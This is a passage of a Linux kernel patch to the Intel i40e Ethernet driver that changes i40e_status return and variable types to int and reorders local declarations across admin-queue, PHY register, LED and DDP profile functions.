+@@ -4130,7 +3989,8 @@ i40e_status i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
+  * @bw_data: Buffer holding enabled TCs, relative/absolute TC BW limit/credits
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
++int
++i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
+ 	u16 seid,
+ 	struct i40e_aqc_configure_switching_comp_bw_config_data *bw_data,
+ 	struct i40e_asq_cmd_details *cmd_details)
+@@ -4147,10 +4007,11 @@ i40e_status i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold VSI BW configuration
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
++			    u16 seid,
++			    struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
++			    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_vsi_bw_config,
+@@ -4164,10 +4025,11 @@ i40e_status i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold VSI BW configuration per TC
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
++				 u16 seid,
++				 struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_vsi_ets_sla_config,
+@@ -4181,10 +4043,11 @@ i40e_status i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold switching component's per TC BW config
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
++				     u16 seid,
++				     struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
++				     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				   i40e_aqc_opc_query_switching_comp_ets_config,
+@@ -4198,10 +4061,11 @@ i40e_status i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold current ETS configuration for the Physical Port
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_port_ets_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_port_ets_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_port_ets_config(struct i40e_hw *hw,
++			      u16 seid,
++			      struct i40e_aqc_query_port_ets_config_resp *bw_data,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_port_ets_config,
+@@ -4215,10 +4079,11 @@ i40e_status i40e_aq_query_port_ets_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold switching component's BW configuration
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
++				    u16 seid,
++				    struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
++				    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_switching_comp_bw_config,
+@@ -4237,8 +4102,9 @@ i40e_status i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
+  * Returns 0 if the values passed are valid and within
+  * range else returns an error.
+  **/
+-static i40e_status i40e_validate_filter_settings(struct i40e_hw *hw,
+-				struct i40e_filter_control_settings *settings)
++static int
++i40e_validate_filter_settings(struct i40e_hw *hw,
++			      struct i40e_filter_control_settings *settings)
+ {
+ 	u32 fcoe_cntx_size, fcoe_filt_size;
+ 	u32 fcoe_fmax;
+@@ -4324,11 +4190,11 @@ static i40e_status i40e_validate_filter_settings(struct i40e_hw *hw,
+  * for a single PF. It is expected that these settings are programmed
+  * at the driver initialization time.
+  **/
+-i40e_status i40e_set_filter_control(struct i40e_hw *hw,
+-				struct i40e_filter_control_settings *settings)
++int i40e_set_filter_control(struct i40e_hw *hw,
++			    struct i40e_filter_control_settings *settings)
+ {
+-	i40e_status ret = 0;
+ 	u32 hash_lut_size = 0;
++	int ret = 0;
+ 	u32 val;
+ 
+ 	if (!settings)
+@@ -4398,11 +4264,11 @@ i40e_status i40e_set_filter_control(struct i40e_hw *hw,
+  * In return it will update the total number of perfect filter count in
+  * the stats member.
+  **/
+-i40e_status i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
+-				u8 *mac_addr, u16 ethtype, u16 flags,
+-				u16 vsi_seid, u16 queue, bool is_add,
+-				struct i40e_control_filter_stats *stats,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
++					  u8 *mac_addr, u16 ethtype, u16 flags,
++					  u16 vsi_seid, u16 queue, bool is_add,
++					  struct i40e_control_filter_stats *stats,
++					  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_control_packet_filter *cmd =
+@@ -4411,7 +4277,7 @@ i40e_status i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_remove_control_packet_filter_completion *resp =
+ 		(struct i40e_aqc_add_remove_control_packet_filter_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (vsi_seid == 0)
+ 		return I40E_ERR_PARAM;
+@@ -4457,7 +4323,7 @@ void i40e_add_filter_to_drop_tx_flow_control_frames(struct i40e_hw *hw,
+ 		   I40E_AQC_ADD_CONTROL_PACKET_FLAGS_DROP |
+ 		   I40E_AQC_ADD_CONTROL_PACKET_FLAGS_TX;
+ 	u16 ethtype = I40E_FLOW_CONTROL_ETHTYPE;
+-	i40e_status status;
++	int status;
+ 
+ 	status = i40e_aq_add_rem_control_packet_filter(hw, NULL, ethtype, flag,
+ 						       seid, 0, true, NULL,
+@@ -4479,14 +4345,14 @@ void i40e_add_filter_to_drop_tx_flow_control_frames(struct i40e_hw *hw,
+  * is not passed then only register at 'reg_addr0' is read.
+  *
+  **/
+-static i40e_status i40e_aq_alternate_read(struct i40e_hw *hw,
+-					  u32 reg_addr0, u32 *reg_val0,
+-					  u32 reg_addr1, u32 *reg_val1)
++static int i40e_aq_alternate_read(struct i40e_hw *hw,
++				  u32 reg_addr0, u32 *reg_val0,
++				  u32 reg_addr1, u32 *reg_val1)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_alternate_write *cmd_resp =
+ 		(struct i40e_aqc_alternate_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!reg_val0)
+ 		return I40E_ERR_PARAM;
+@@ -4515,12 +4381,12 @@ static i40e_status i40e_aq_alternate_read(struct i40e_hw *hw,
+  *
+  * Suspend port's Tx traffic
+  **/
+-i40e_status i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
+-				    struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
++			    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_tx_sched_ind *cmd;
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	cmd = (struct i40e_aqc_tx_sched_ind *)&desc.params.raw;
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_suspend_port_tx);
+@@ -4537,11 +4403,11 @@ i40e_status i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
+  *
+  * Resume port's Tx traffic
+  **/
+-i40e_status i40e_aq_resume_port_tx(struct i40e_hw *hw,
+-				   struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_resume_port_tx(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_resume_port_tx);
+ 
+@@ -4611,18 +4477,18 @@ void i40e_set_pci_config_data(struct i40e_hw *hw, u16 link_status)
+  * Dump internal FW/HW data for debug purposes.
+  *
+  **/
+-i40e_status i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
+-			       u8 table_id, u32 start_index, u16 buff_size,
+-			       void *buff, u16 *ret_buff_size,
+-			       u8 *ret_next_table, u32 *ret_next_index,
+-			       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
++		       u8 table_id, u32 start_index, u16 buff_size,
++		       void *buff, u16 *ret_buff_size,
++		       u8 *ret_next_table, u32 *ret_next_index,
++		       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_debug_dump_internals *cmd =
+ 		(struct i40e_aqc_debug_dump_internals *)&desc.params.raw;
+ 	struct i40e_aqc_debug_dump_internals *resp =
+ 		(struct i40e_aqc_debug_dump_internals *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (buff_size == 0 || !buff)
+ 		return I40E_ERR_PARAM;
+@@ -4663,12 +4529,12 @@ i40e_status i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
+  *
+  * Read bw from the alternate ram for the given pf
+  **/
+-i40e_status i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
+-				      u32 *max_bw, u32 *min_bw,
+-				      bool *min_valid, bool *max_valid)
++int i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
++			      u32 *max_bw, u32 *min_bw,
++			      bool *min_valid, bool *max_valid)
+ {
+-	i40e_status status;
+ 	u32 max_bw_addr, min_bw_addr;
++	int status;
+ 
+ 	/* Calculate the address of the min/max bw registers */
+ 	max_bw_addr = I40E_ALT_STRUCT_FIRST_PF_OFFSET +
+@@ -4703,13 +4569,14 @@ i40e_status i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
+  *
+  * Configure partitions guaranteed/max bw
+  **/
+-i40e_status i40e_aq_configure_partition_bw(struct i40e_hw *hw,
+-			struct i40e_aqc_configure_partition_bw_data *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_configure_partition_bw(struct i40e_hw *hw,
++			       struct i40e_aqc_configure_partition_bw_data *bw_data,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+-	i40e_status status;
+-	struct i40e_aq_desc desc;
+ 	u16 bwd_size = sizeof(*bw_data);
++	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_configure_partition_bw);
+@@ -4738,11 +4605,11 @@ i40e_status i40e_aq_configure_partition_bw(struct i40e_hw *hw,
+  *
+  * Reads specified PHY register value
+  **/
+-i40e_status i40e_read_phy_register_clause22(struct i40e_hw *hw,
+-					    u16 reg, u8 phy_addr, u16 *value)
++int i40e_read_phy_register_clause22(struct i40e_hw *hw,
++				    u16 reg, u8 phy_addr, u16 *value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
+ 	u8 port_num = (u8)hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
+ 	u32 command = 0;
+ 	u16 retry = 1000;
+ 
+@@ -4783,11 +4650,11 @@ i40e_status i40e_read_phy_register_clause22(struct i40e_hw *hw,
+  *
+  * Writes specified PHY register value
+  **/
+-i40e_status i40e_write_phy_register_clause22(struct i40e_hw *hw,
+-					     u16 reg, u8 phy_addr, u16 value)
++int i40e_write_phy_register_clause22(struct i40e_hw *hw,
++				     u16 reg, u8 phy_addr, u16 value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
+ 	u8 port_num = (u8)hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
+ 	u32 command  = 0;
+ 	u16 retry = 1000;
+ 
+@@ -4824,13 +4691,13 @@ i40e_status i40e_write_phy_register_clause22(struct i40e_hw *hw,
+  *
+  * Reads specified PHY register value
+  **/
+-i40e_status i40e_read_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 *value)
++int i40e_read_phy_register_clause45(struct i40e_hw *hw,
++				    u8 page, u16 reg, u8 phy_addr, u16 *value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
++	u8 port_num = hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
+ 	u32 command = 0;
+ 	u16 retry = 1000;
+-	u8 port_num = hw->func_caps.mdio_port_num;
+ 
+ 	command = (reg << I40E_GLGEN_MSCA_MDIADD_SHIFT) |
+ 		  (page << I40E_GLGEN_MSCA_DEVADD_SHIFT) |
+@@ -4898,13 +4765,13 @@ phy_read_end:
+  *
+  * Writes value to specified PHY register
+  **/
+-i40e_status i40e_write_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 value)
++int i40e_write_phy_register_clause45(struct i40e_hw *hw,
++				     u8 page, u16 reg, u8 phy_addr, u16 value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
+-	u32 command = 0;
+-	u16 retry = 1000;
+ 	u8 port_num = hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
++	u16 retry = 1000;
++	u32 command = 0;
+ 
+ 	command = (reg << I40E_GLGEN_MSCA_MDIADD_SHIFT) |
+ 		  (page << I40E_GLGEN_MSCA_DEVADD_SHIFT) |
+@@ -4965,10 +4832,10 @@ phy_write_end:
+  *
+  * Writes value to specified PHY register
+  **/
+-i40e_status i40e_write_phy_register(struct i40e_hw *hw,
+-				    u8 page, u16 reg, u8 phy_addr, u16 value)
++int i40e_write_phy_register(struct i40e_hw *hw,
++			    u8 page, u16 reg, u8 phy_addr, u16 value)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	switch (hw->device_id) {
+ 	case I40E_DEV_ID_1G_BASE_T_X722:
+@@ -5004,10 +4871,10 @@ i40e_status i40e_write_phy_register(struct i40e_hw *hw,
+  *
+  * Reads specified PHY register value
+  **/
+-i40e_status i40e_read_phy_register(struct i40e_hw *hw,
+-				   u8 page, u16 reg, u8 phy_addr, u16 *value)
++int i40e_read_phy_register(struct i40e_hw *hw,
++			   u8 page, u16 reg, u8 phy_addr, u16 *value)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	switch (hw->device_id) {
+ 	case I40E_DEV_ID_1G_BASE_T_X722:
+@@ -5056,17 +4923,17 @@ u8 i40e_get_phy_address(struct i40e_hw *hw, u8 dev_num)
+  *
+  * Blinks PHY link LED
+  **/
+-i40e_status i40e_blink_phy_link_led(struct i40e_hw *hw,
+-				    u32 time, u32 interval)
++int i40e_blink_phy_link_led(struct i40e_hw *hw,
++			    u32 time, u32 interval)
+ {
+-	i40e_status status = 0;
+-	u32 i;
+-	u16 led_ctl;
+-	u16 gpio_led_port;
+-	u16 led_reg;
+ 	u16 led_addr = I40E_PHY_LED_PROV_REG_1;
++	u16 gpio_led_port;
+ 	u8 phy_addr = 0;
++	int status = 0;
++	u16 led_ctl;
+ 	u8 port_num;
++	u16 led_reg;
++	u32 i;
+ 
+ 	i = rd32(hw, I40E_PFGEN_PORTNUM);
+ 	port_num = (u8)(i & I40E_PFGEN_PORTNUM_PORT_NUM_MASK);
+@@ -5128,12 +4995,12 @@ phy_blinking_end:
+  * @led_addr: LED register address
+  * @reg_val: read register value
+  **/
+-static enum i40e_status_code i40e_led_get_reg(struct i40e_hw *hw, u16 led_addr,
+-					      u32 *reg_val)
++static int i40e_led_get_reg(struct i40e_hw *hw, u16 led_addr,
++			    u32 *reg_val)
+ {
+-	enum i40e_status_code status;
+ 	u8 phy_addr = 0;
+ 	u8 port_num;
++	int status;
+ 	u32 i;
+ 
+ 	*reg_val = 0;
+@@ -5162,12 +5029,12 @@ static enum i40e_status_code i40e_led_get_reg(struct i40e_hw *hw, u16 led_addr,
+  * @led_addr: LED register address
+  * @reg_val: register value to write
+  **/
+-static enum i40e_status_code i40e_led_set_reg(struct i40e_hw *hw, u16 led_addr,
+-					      u32 reg_val)
++static int i40e_led_set_reg(struct i40e_hw *hw, u16 led_addr,
++			    u32 reg_val)
+ {
+-	enum i40e_status_code status;
+ 	u8 phy_addr = 0;
+ 	u8 port_num;
++	int status;
+ 	u32 i;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_AQ_PHY_ACCESS_CAPABLE) {
+@@ -5197,17 +5064,17 @@ static enum i40e_status_code i40e_led_set_reg(struct i40e_hw *hw, u16 led_addr,
+  * @val: original value of register to use
+  *
+  **/
+-i40e_status i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
+-			     u16 *val)
++int i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
++		     u16 *val)
+ {
+-	i40e_status status = 0;
+ 	u16 gpio_led_port;
+ 	u8 phy_addr = 0;
+-	u16 reg_val;
++	u32 reg_val_aq;
++	int status = 0;
+ 	u16 temp_addr;
++	u16 reg_val;
+ 	u8 port_num;
+ 	u32 i;
+-	u32 reg_val_aq;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_AQ_PHY_ACCESS_CAPABLE) {
+ 		status =
+@@ -5252,12 +5119,12 @@ i40e_status i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
+  * Set led's on or off when controlled by the PHY
+  *
+  **/
+-i40e_status i40e_led_set_phy(struct i40e_hw *hw, bool on,
+-			     u16 led_addr, u32 mode)
++int i40e_led_set_phy(struct i40e_hw *hw, bool on,
++		     u16 led_addr, u32 mode)
+ {
+-	i40e_status status = 0;
+ 	u32 led_ctl = 0;
+ 	u32 led_reg = 0;
++	int status = 0;
+ 
+ 	status = i40e_led_get_reg(hw, led_addr, &led_reg);
+ 	if (status)
+@@ -5301,14 +5168,14 @@ restore_config:
+  * Use the firmware to read the Rx control register,
+  * especially useful if the Rx unit is under heavy pressure
+  **/
+-i40e_status i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 *reg_val,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
++				 u32 reg_addr, u32 *reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_rx_ctl_reg_read_write *cmd_resp =
+ 		(struct i40e_aqc_rx_ctl_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!reg_val)
+ 		return I40E_ERR_PARAM;
+@@ -5332,8 +5199,8 @@ i40e_status i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
+  **/
+ u32 i40e_read_rx_ctl(struct i40e_hw *hw, u32 reg_addr)
+ {
+-	i40e_status status = 0;
+ 	bool use_register;
++	int status = 0;
+ 	int retry = 5;
+ 	u32 val = 0;
+ 
+@@ -5367,14 +5234,14 @@ do_retry:
+  * Use the firmware to write to an Rx control register,
+  * especially useful if the Rx unit is under heavy pressure
+  **/
+-i40e_status i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 reg_val,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
++				  u32 reg_addr, u32 reg_val,
++				  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_rx_ctl_reg_read_write *cmd =
+ 		(struct i40e_aqc_rx_ctl_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_rx_ctl_reg_write);
+ 
+@@ -5394,8 +5261,8 @@ i40e_status i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
+  **/
+ void i40e_write_rx_ctl(struct i40e_hw *hw, u32 reg_addr, u32 reg_val)
+ {
+-	i40e_status status = 0;
+ 	bool use_register;
++	int status = 0;
+ 	int retry = 5;
+ 
+ 	use_register = (((hw->aq.api_maj_ver == 1) &&
+@@ -5457,16 +5324,16 @@ static void i40e_mdio_if_number_selection(struct i40e_hw *hw, bool set_mdio,
+  * NOTE: In common cases MDIO I/F number should not be changed, thats why you
+  * may use simple wrapper i40e_aq_set_phy_register.
+  **/
+-enum i40e_status_code i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
+-			     u8 phy_select, u8 dev_addr, bool page_change,
+-			     bool set_mdio, u8 mdio_num,
+-			     u32 reg_addr, u32 reg_val,
+-			     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
++				 u8 phy_select, u8 dev_addr, bool page_change,
++				 bool set_mdio, u8 mdio_num,
++				 u32 reg_addr, u32 reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_phy_register_access *cmd =
+ 		(struct i40e_aqc_phy_register_access *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_phy_register);
+@@ -5502,16 +5369,16 @@ enum i40e_status_code i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
+  * NOTE: In common cases MDIO I/F number should not be changed, thats why you
+  * may use simple wrapper i40e_aq_get_phy_register.
+  **/
+-enum i40e_status_code i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+-			     u8 phy_select, u8 dev_addr, bool page_change,
+-			     bool set_mdio, u8 mdio_num,
+-			     u32 reg_addr, u32 *reg_val,
+-			     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
++				 u8 phy_select, u8 dev_addr, bool page_change,
++				 bool set_mdio, u8 mdio_num,
++				 u32 reg_addr, u32 *reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_phy_register_access *cmd =
+ 		(struct i40e_aqc_phy_register_access *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_phy_register);
+@@ -5542,18 +5409,17 @@ enum i40e_status_code i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+  * @error_info: returns error information
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum
+-i40e_status_code i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
+-				   u16 buff_size, u32 track_id,
+-				   u32 *error_offset, u32 *error_info,
+-				   struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
++		      u16 buff_size, u32 track_id,
++		      u32 *error_offset, u32 *error_info,
++		      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_write_personalization_profile *cmd =
+ 		(struct i40e_aqc_write_personalization_profile *)
+ 		&desc.params.raw;
+ 	struct i40e_aqc_write_ddp_resp *resp;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_write_personalization_profile);
+@@ -5586,15 +5452,14 @@ i40e_status_code i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
+  * @flags: AdminQ command flags
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum
+-i40e_status_code i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
+-				      u16 buff_size, u8 flags,
+-				      struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
++			 u16 buff_size, u8 flags,
++			 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_applied_profiles *cmd =
+ 		(struct i40e_aqc_get_applied_profiles *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_personalization_profile_list);
+@@ -5693,14 +5558,13 @@ i40e_find_section_in_profile(u32 section_type,
+  * @hw: pointer to the hw struct
+  * @aq: command buffer containing all data to execute AQ
+  **/
+-static enum
+-i40e_status_code i40e_ddp_exec_aq_section(struct i40e_hw *hw,
+-					  struct i40e_profile_aq_section *aq)
++static int i40e_ddp_exec_aq_section(struct i40e_hw *hw,
++				    struct i40e_profile_aq_section *aq)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	u8 *msg = NULL;
+ 	u16 msglen;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, aq->opcode);
+ 	desc.flags |= cpu_to_le16(aq->flags);
+@@ -5740,14 +5604,14 @@ i40e_status_code i40e_ddp_exec_aq_section(struct i40e_hw *hw,
+  *
+  * Validates supported devices and profile's sections.
+  */
+-static enum i40e_status_code
++static int
+ i40e_validate_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 		      u32 track_id, bool rollback)
+ {
+ 	struct i40e_profile_section_header *sec = NULL;
+-	i40e_status status = 0;
+ 	struct i40e_section_table *sec_tbl;
+ 	u32 vendor_dev_id;
++	int status = 0;
+ 	u32 dev_cnt;
+ 	u32 sec_off;
+ 	u32 i;
+@@ -5805,16 +5669,16 @@ i40e_validate_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Handles the download of a complete package.
+  */
+-enum i40e_status_code
++int
+ i40e_write_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 		   u32 track_id)
+ {
+-	i40e_status status = 0;
+-	struct i40e_section_table *sec_tbl;
+ 	struct i40e_profile_section_header *sec = NULL;
+ 	struct i40e_profile_aq_section *ddp_aq;
+-	u32 section_size = 0;
++	struct i40e_section_table *sec_tbl;
+ 	u32 offset = 0, info = 0;
++	u32 section_size = 0;
++	int status = 0;
+ 	u32 sec_off;
+ 	u32 i;
+ 
+@@ -5868,15 +5732,15 @@ i40e_write_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Rolls back previously loaded package.
+  */
+-enum i40e_status_code
++int
+ i40e_rollback_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 		      u32 track_id)
+ {
+ 	struct i40e_profile_section_header *sec = NULL;
+-	i40e_status status = 0;
+ 	struct i40e_section_table *sec_tbl;
+ 	u32 offset = 0, info = 0;
+ 	u32 section_size = 0;
++	int status = 0;
+ 	u32 sec_off;
+ 	int i;
+ 
+@@ -5920,15 +5784,15 @@ i40e_rollback_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Register a profile to the list of loaded profiles.
+  */
+-enum i40e_status_code
++int
+ i40e_add_pinfo_to_list(struct i40e_hw *hw,
+ 		       struct i40e_profile_segment *profile,
+ 		       u8 *profile_info_sec, u32 track_id)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_profile_section_header *sec = NULL;
+ 	struct i40e_profile_info *pinfo;
+ 	u32 offset = 0, info = 0;
++	int status = 0;
+ 
+ 	sec = (struct i40e_profile_section_header *)profile_info_sec;
+ 	sec->tbl_size = 1;
+@@ -5962,7 +5826,7 @@ i40e_add_pinfo_to_list(struct i40e_hw *hw,
+  * of the function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_cloud_filters_element_data *filters,
+ 			  u8 filter_count)
+@@ -5970,8 +5834,8 @@ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 buff_len;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_add_cloud_filters);
+@@ -5999,7 +5863,7 @@ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 seid,
+  * function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 			     struct i40e_aqc_cloud_filters_element_bb *filters,
+ 			     u8 filter_count)
+@@ -6007,8 +5871,8 @@ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
